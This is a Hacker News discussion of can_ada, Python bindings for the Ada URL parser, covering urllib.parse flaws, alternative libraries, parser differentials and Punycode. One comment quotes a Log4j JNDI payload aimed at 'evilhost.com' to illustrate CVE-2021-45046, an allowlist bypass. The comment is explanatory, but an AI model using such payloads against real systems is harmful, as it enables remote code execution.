[HN Gopher] Parsing URLs in Python
       ___________________________________________________________________
        
       Parsing URLs in Python
        
       Author : ibobev
       Score  : 158 points
       Date   : 2024-03-16 16:53 UTC (1 days ago)
        
 (HTM) web link (tkte.ch)
 (TXT) w3m dump (tkte.ch)
        
       | memco wrote:
       | This is intriguing to me for the performance and correctness
       | reasons, but also if it makes the result more dev friendly than
       | the urllib.parse tiple-ish-object result thing.
        
         | nerdponx wrote:
         | I posted this elsewhere in the thread, but there absolutely is
         | prior art here. Check out Yarl (urllib.parse wrapper with the
         | nicer interface) and Hyperlink (green field, immutable OO
         | style, focus on correctness). Both on PyPI for many years now.
        
           | memco wrote:
           | Thanks! I have come across yarl, but not hyperlink.
        
         | diarrhea wrote:
         | Yeah, that tuple API is bizarre. It really doesn't play well
         | with type annotations either.
        
       | Areading314 wrote:
       | Hard to imagine the tradeoff of using a third party binary
       | library developed this year vs just using urllib.parse being
       | worth it. Is this solving a real problem?
        
         | pyuser583 wrote:
         | urlib.parse is a pain. We really need something more like
         | pathlib.Path.
        
           | masklinn wrote:
           | That used to be werkzeug.urls, kinda (it certainly had a more
           | convenient API than urllib.parse), but it was killed in
           | Werkzeug 3.
        
             | pyuser583 wrote:
             | I remember and miss that. But I'm not going to install
             | werkzeug just for the url parsing.
        
               | d_kahneman7 wrote:
               | Is it that inconvenient?
        
           | Ch00k wrote:
           | There is https://github.com/gruns/furl
        
             | AMCMneCy wrote:
             | Also https://github.com/aio-libs/yarl
        
               | 4ec0755f5522 wrote:
               | I use yarl as my default for this as well, it's been
               | great to work with.
        
             | pyuser583 wrote:
             | Yes! That's the one I like!
        
             | VagabundoP wrote:
             | This library is very pythonic.
        
           | joouha wrote:
           | You might be interested in
           | https://github.com/fsspec/universal_pathlib
        
         | masklinn wrote:
         | According to itself, it's solving the issue of parsing
         | differentials vulnerabilities: urllib.parse is ad-hoc and
         | pretty crummy, and the headliner function "urlparse" is
         | literally the one you should not use under any circumstance: it
         | follows RFC 1808 (maybe, anyway) which was deprecated by RFC
         | 2396 _25 years ago_.
         | 
         | The odds that any other parser uses the same broken semantics
         | are basically nil.
        
           | Areading314 wrote:
           | It seems unlikely that this C++ library written by a solo dev
           | is somehow more secure than the Python standard library would
           | be for such a security-sensitive task.
        
             | masklinn wrote:
             | Not in the sense of differential vulnerabilities, since the
             | standard library _refuses_ to match any sort of modern
             | standard.
             | 
             | It's also
             | 
             | 1. not a solo dev
             | 
             | 2. Daniel Lemire
             | 
             | 3. a serious engineering _and_ research effort:
             | https://arxiv.org/pdf/2311.10533.pdf
        
               | Areading314 wrote:
               | This is the commit history:
               | https://github.com/TkTech/can_ada/commits/main/
               | 
               | I guess you are right that there are 2 commits from a
               | different dev, so it is technically not a solo project. I
               | still wouldn't ever use this in production code.
        
               | bqmjjx0kac wrote:
               | The can_ada repo threw me off, too. It looks super
               | amateurish because of the lack of tests, fuzzers, etc.
               | 
               | But it appears that they've just exported the meat of the
               | Ada project and left everything else upstream.
        
               | masklinn wrote:
               | ...
               | 
               | can_ada is just the python bindings.
               | 
               | The actual underlying project is at
               | https://github.com/ada-url/ada
        
             | TkTech wrote:
             | Hi, can_ada (but not ada!) dev here. Ada is over 20k lines
             | of well-tested and fuzzed source by 25+ developers, along
             | with an accompanying research paper. It is the parser used
             | in node.js and parses billions of URLs a day.
             | 
             | can_ada is simply a 60-line glue and packaging making it
             | available with low overhead to Python.
        
               | Areading314 wrote:
               | Ah, that makes more sense -- it might be a good idea to
               | integrate with the upstream library as a submodule rather
               | than lifting the actual .cpp/.h files into the bindings
               | repo. That way people know the upstream C++ code is from
               | a much more active project.
               | 
               | Despite my snarky comments, thank you for contributing to
               | the python ecosystem, this does seem like a cool project
               | for high performance URL parsing!
        
           | woodruffw wrote:
           | I agree that the stdlib parser is a mess, but as an
           | observation: replacing one use of it with a (better!)
           | implementation _introduces_ a potential parser differential
           | where one didn't exist before. I've seen this issue crop up
           | multiple times in real Python codebases, where a well-
           | intentioned developer adds a differential by incrementally
           | replacing the old, bad implementation.
           | 
           | That's the perverse nature of "wrong but ubiquitous" parsers:
           | unless you're confident that your replacement is _complete_ ,
           | you can make the situation worse, not better.
        
             | Spivak wrote:
             | > unless you're confident that your replacement is complete
             | 
             | And that any 3rd party libs you use also don't ever call
             | the stdlib parser internally because you do not want to
             | debug why a URL works through some code paths but not
             | others.
             | 
             | Turns out that url parsing is a cross-cutting concern like
             | logging where libs should defer to the calling code's
             | implementation but the Python devs couldn't have known that
             | when this module was written.
        
         | yagiznizipli wrote:
         | Ada was developed in eoy 2022, and included in Node.js since
         | March 2023. Since then, Ada powers Node.js, Cloudflare workers,
         | Redpanda, Clickhouse and many more libraries.
        
       | pyuser583 wrote:
       | The Ada programming language is cursed with overlapping acronyms.
       | GPS, ADA, SPARK, AWS. Seems it just got a little bit worse.
        
         | Solvency wrote:
         | It is _mindboggling_ to me how often developers create project
         | names without even _trying_ to search for precedent names _in
         | their own domain /industry_.
         | 
         | Calling this Ada is just ridiculous.
        
           | pyuser583 wrote:
           | Ada needs to fight back. Java templating library! Python
           | dependency resolver! Zag image manipulation library! SQL
           | event logging persistence framework!
           | 
           | I can't believe Amazon wasn't violating some anti-competition
           | rule by using "AWS" for "Amazon Web Services" when it already
           | meant "Ada Web Server."
           | 
           | Wow when I search for "Ada GPS" I get global position system
           | support libraries before GNAT Programming Studio.
        
           | gjvc wrote:
           | yes but they think it's punny/funny/clever
        
             | nine_k wrote:
             | It's usually a poor reason. Calling the GNU Image
             | Manipulation Program "GIMP" was kinda funny and punny, and
             | maybe humble, but not wise.
             | 
             | Inkscape or Krita have less poignant, but more reasonable
             | name. (But yes, such an approach removes some of the
             | teenage fun from doing a project.)
        
           | yagiznizipli wrote:
           | Ada developer here. Ada URL parser is named after my daughter
           | Ada. We chose this name in particular as a reference to Ada
           | Lovelace.
        
             | Hendrikto wrote:
             | > We chose this name in particular as a reference to Ada
             | Lovelace.
             | 
             | Just like the ~20 other projects named Ada.
        
         | masklinn wrote:
         | > Ada is a WHATWG-compliant and fast URL parser written in
         | modern C++
         | 
         | Why would you do that, Daniel?
        
           | TkTech wrote:
           | Hah :) It's named after Yagiz Nizipli's (Ada dev) newborn
           | daughter, Ada.
        
           | yagiznizipli wrote:
           | Ada developer here, Ada is the name of my daughter, and this
           | project is my gift to her, to remember me.
        
             | pyuser583 wrote:
             | Congrats on having a daughter! I hope and day she'll need
             | to parse a url, and be able to see your love for her in her
             | code!
        
         | EmilStenstrom wrote:
         | At least the can_ada (canada!) makes it a little bit more
         | unique.
        
       | ulrischa wrote:
       | Parsing an url is really a pain in the a*
        
         | SloopJon wrote:
         | Another post in this thread was downvoted and flagged (really?)
         | for claiming that URL parsing isn't difficult. The linked
         | article claims that "Parsing URLs _correctly_ is surprisingly
         | hard. " As a software tester, I'm very willing to believe that,
         | but I don't know that the article really made the case.
         | 
         | I did find a paper describing some vulnerabilities in popular
         | URL parsing libraries, including urllib and urllib3. Blog post
         | here:
         | 
         | https://claroty.com/team82/research/exploiting-url-parsing-c...
         | 
         | Paper here:
         | 
         | https://web-assets.claroty.com/exploiting-url-parsing-confus...
         | 
         | If you remember the Log4j vulnerability from a couple of years
         | ago, that was an URL parsing bug.
        
           | masklinn wrote:
           | > If you remember the Log4j vulnerability from a couple of
           | years ago, that was an URL parsing bug.
           | 
           | I don't think that's a fair description of the issue.
           | 
           | The log4j vulnerability was that it specifically added JNDI
           | support (https://issues.apache.org/jira/browse/LOG4J2-313) to
           | property substitution (https://logging.apache.org/log4j/2.x/m
           | anual/configuration.ht...), which it would apply on logged
           | messages. So it was a pretty literal feature of log4j. log4j
           | would just pass the URL to JNDI for resolution, and
           | substitute the result.
        
             | SloopJon wrote:
             | I didn't look into this in detail at the time, but the
             | report's summary of CVE-2021-45046 is that the parser that
             | validated an URL behaved differently than a separate parser
             | used to fetch the URL, so an URL like
             | jndi:ldap://127.0.0.1#.evilhost.com:1389/a
             | 
             | is validated as 127.0.0.1, which may be whitelisted, but
             | fetched from evilhost.com, which probably isn't.
        
       | bqmjjx0kac wrote:
       | Writing a new parser in C++ is a mistake IMO. At the very least,
       | you need to write a fuzzer. At best, you should be using one of
       | the many memory safe languages available to you.
       | 
       | I retract my criticism if this project is just for fun.
       | 
       | Edit: downvoters, do you disagree?
       | 
       | Edit2: OK, I may have judged a bit prematurely. _Ada_ itself has
       | fuzzers and tests. They 're just not exported to the _can_ada_
       | project.
        
         | yagiznizipli wrote:
         | Ada developer here. Ada has more than 5000 tests, is included
         | in oss-fuzz project and battle tested in Node.js and Cloudflare
         | workers.
        
           | bqmjjx0kac wrote:
           | I apologize for the misjudgment. I just followed the link to
           | can_ada and saw really minimal tests, e.g. https://github.com
           | /TkTech/can_ada/blob/main/tests/test_parsi...
           | 
           | I didn't understand that can_ada is not where the parser is
           | developed.
        
       | VagabundoP wrote:
       | Okay so some googling found me that the "xn--" means the rest of
       | the hostname will be unicode, but why does e become -fsa in
       | www.xn--googl-fsa.com.
       | 
       | Google failed on the second part.
        
         | whalesalad wrote:
         | It's called an IDN. This is an encoding format called puny code
         | that transforms international domains into ascii
        
         | js2 wrote:
         | Because that's the Punycode representation:
         | 
         | https://en.wikipedia.org/wiki/Punycode
         | 
         | https://www.punycoder.com/
        
           | andy99 wrote:
           | I wasn't aware of this, I'd seen those URLs before but only
           | in the context of Chinese ones and thought it was Chinese-
           | specific.
           | 
           | It's interesting because I just went down an apparent rabbit
           | hole inplementing Byte-level encoding for using language
           | models with unicode. There each byte in a unicode character
           | is mapped to a printable character that goes up to 255 <
           | ord(x) < 511 (I don't remember the highest but the point is
           | each byte is mapped to another printable unicode character.
           | 
           | See https://github.com/openai/gpt-2/blob/9b63575ef42771a01506
           | 0c9...
           | 
           | And the actual list of characters:
           | 
           | https://github.com/rbitr/llm.f90/blob/dev/phi2/phi2/pretoken.
           | ..
        
         | ekimekim wrote:
         | To expand on the sibling comments: This encoding (called
         | Punycode) works by combining the character to encode (e) and
         | the position the character should be in (the 7th position out
         | of a possible 7) into a single number. e is 233, there are 7
         | possible positions, and it is in position 6 (0-indexed) so that
         | single number is 233 * 7 + 6 = 1637. This is then encoded via a
         | fairly complex variable-length encoding scheme into the letters
         | "fsa".
         | 
         | See https://en.wikipedia.org/wiki/Punycode#Encoding_the_non-
         | ASCI...
        
         | pixelesque wrote:
         | In case anyone else is confused as to why the domain in the
         | example provided needs to be unicode (compared to the filename
         | which is obvious): it's because the hyphen is the shorter '-'
         | char, which is extended ASCII 226 not the standard '-' (which
         | would be ASCII 45).
        
           | ezequiel-garzon wrote:
           | The first character you pasted is U+2011 (8209 in decimal),
           | does not appear in the document and cannot be ASCII as it
           | goes beyond the codepoint 127/7F. Also, U+2011 is meant to be
           | a non-breaking hyphen.
        
         | ks2048 wrote:
         | This system seems pretty weird to me.
         | 
         | I was wondering, can that clash with a "normal" domain
         | registered as "xn--....."? Apparently there is another specific
         | rule in RFC 5891 saying "The Unicode string MUST NOT contain
         | "--" (two consecutive hyphens) in the third and fourth
         | character positions" [0]
         | 
         | Also, if I was forced to represent Unicode as ASCII, punycode
         | encoding is not the obvious one - it's pretty confusing. But, I
         | don't know much about how and why it was chosen, so I assume
         | there's good reason.
         | 
         | [0]
         | https://datatracker.ietf.org/doc/html/rfc5891#section-4.2.3....
        
           | lathiat wrote:
           | I mean, yeah, but the odds of someone using "xn--" on the
           | start of a domain are pretty small. The double dash is pretty
           | uncommon.
        
           | xg15 wrote:
           | IDNs and Punycode were basically bolted-on extensions to DNS
           | that were added after DNS was already widely deployed.
           | Because there was no "proper" extension mechanism available,
           | it was a design requirement that they can be implemented "on
           | top" of the standard DNS without having to change any of the
           | underlying components. So I think most of the DNS
           | infrastructure can be (and is) still completely unaware that
           | IDNs and Punycode exists.
           | 
           | Actually, I wonder what happens if you take a "normal" (i.e.
           | non-IDN, ascii-only) domain and encode it as Punycode. Should
           | the encoded and non-encoded domains be considered identical
           | or separate? (for purposes of DNS resolutions, origin
           | separation, etc)
           | 
           | Identical would be more intuitive and would match the
           | behavior of domain names with non-ascii characters - on the
           | other hand, this would require reworking of ALL non-punycode-
           | aware DNS software, which I'm doubtful is possible.
           | 
           | So this seems like a tricky thing to get right.
        
         | Zambyte wrote:
         | Regarding the quality of Google search results - I copied this
         | comment verbatim into GPT 3.5, Claude 1, and Mistral small (the
         | lowest quality LLMs from each provider available through Kagi)
         | and each one explained Punycode encoding.
        
         | atorodius wrote:
         | FWIW I find this is the perfect question for ChatGPT/Gemini.
         | Whenever the knowedge is somewhere on the web but hard to
         | Google, I use these LLMs.
         | 
         | In this case, Gemini correctly points to Punycode
        
       | bormaj wrote:
       | Why not just use `httpx`? If you're not bound to the stdlib, it's
       | a great alternative to `requests` and url parse
        
         | kmike84 wrote:
         | The URL parsing in httpx is rfc3986, which is not the same as
         | WHATWG URL living standard.
         | 
         | rfc3986 may reject URLs which browsers accept, or it can handle
         | them in a different way. WHATWG URL living standard tries to
         | put on paper the real browser behavior, so it's a much better
         | standard if you need to parse URLs extracted from real-world
         | web pages.
        
         | gjvc wrote:
         | httpx is great, and "needs to be in base"
        
           | orf wrote:
           | No it doesn't, absolutely not. It's ironic that you say this
           | after the post you're commenting on spells out quite
           | explicitly why things "in base" are hard to change and adapt.
        
             | gjvc wrote:
             | where do you draw the line with this approach?
        
       | ojbyrne wrote:
       | Looking at the github site for can_ada, I discovered that the
       | developers live in Montreal, Canada. Nice one.
        
         | TkTech wrote:
         | I do! :) I should probably also never be allowed to name
         | things.
        
       | kmike84 wrote:
       | A great initiative!
       | 
       | We need a better URL parser in Scrapy, for similar reasons. Speed
       | and WHATWG standard compliance (i.e. do the same as web browsers)
       | are the main things.
       | 
       | It's possible to get closer to WHATWG behavior by using urllib
       | and some hacks. This is what https://github.com/scrapy/w3lib
       | does, which Scrapy currently uses. But it's still not quite
       | compliant.
       | 
       | Also, surprisingly, on some crawls URL parsing can take CPU
       | amounts similar to HTML parsing.
       | 
       | Ada / can_ada look very promising!
        
         | TkTech wrote:
         | can_ada dev here. Scrapy is a fantastic project, we used it
         | extensively at 360pi (now Numerator), making trillions of
         | requests. Let me know if I can help :)
        
       | JulianWasTaken wrote:
       | Nice.
       | 
       | I'll also throw in that I've recently wrote bindings to Mozilla's
       | servo URL library.
       | 
       | Those live at https://github.com/crate-py/url
       | 
       | They're not complete yet (meaning only the parsing bits are
       | exposed, not URL modification) but I too was frustrated with the
       | state of URL parsing.
        
         | timhh wrote:
         | IMO that URL crate is not especially high quality. I barely
         | work with URLs and I quickly found an embarrassingly trivial
         | bug:
         | 
         | https://github.com/servo/rust-url/issues/864#issuecomment-16...
        
       | phyzome wrote:
       | Honestly to hell with the WHATWG's weird pseudo-standard.
       | Backslashes? Five forward slashes? _No one_ is sending those URLs
       | around, and if they are, they should fix it. The only thing that
       | needs to deal with that kind of malformed URL is the browser 's
       | address bar. If browsers want to do fixups on broken URLs at that
       | point, they should feel free to, but it shouldn't pollute an
       | entire spec.
       | 
       | (It's not even a real standard -- it's a "living standard", which
       | means it just changes randomly and there's no way to actually say
       | "yes, you're compliant with that".)
        
         | domenicd wrote:
         | It's always been extremely funny to me how arguments like this
         | and from the curl author go. "Yes, I had to change curl away
         | from strictly accepting two slashes, for web compatibility. But
         | `while(slash) { advance_parser() }`? That's completely
         | unreasonable! `while(slash && ++i <= 3)` is so much better, and
         | works almost as well!" Ok, whatever...
         | 
         | As for your claim about living standards, I'd encourage you to
         | read https://whatwg.org/faq#living-standard
        
       | nerdponx wrote:
       | No mention of prior art? The Hyperlink library has stated
       | correctness as its goal for a long time:
       | https://pypi.org/project/hyperlink
       | 
       | Of course there is always room for new projects, but it still
       | feels weird to act as if this is the first time anybody has ever
       | tried this. It seems like a lot of people are under this same
       | mistaken impression, at least according to the sample of HN users
       | who commented in this thread.
        
         | TkTech wrote:
         | Hyperlink (which I didn't know existed, by the way) is not a
         | parser for the WHATWG spec, it's for RFC3986. You seem to be
         | getting things confused.
        
           | nerdponx wrote:
           | The article makes it sound like the only parser for URLS in
           | the entire Python ecosystem is urllib.parse, regardless of
           | which spec it supports. Hyperlink and Yarl are absolutely
           | prior art here IMO, and at least deserve a mention in an
           | article like this.
        
       | abstractbslayer wrote:
       | Pretty urls are the most unnecessary thing that was invented,
       | they don't provide anything that non pretty urls can't provide
       | and millions of parsers have to process them on every request.
       | What a waste.
        
         | edflsafoiewq wrote:
         | What is a "pretty url"?
        
           | d0mine wrote:
           | There are people who are not native English speakers. They
           | might find Unicode useful.
        
       | d0mine wrote:
       | stdlib behavior may be more preferable:
       | 
       | - resolving "../" may have security implications - unicode
       | hostname seems more readable. To get punycode, one can call
       | .encode("idna") if necessary.
       | 
       | How often parsing urls is a performance bottleneck?
        
       ___________________________________________________________________
       (page generated 2024-03-17 23:02 UTC)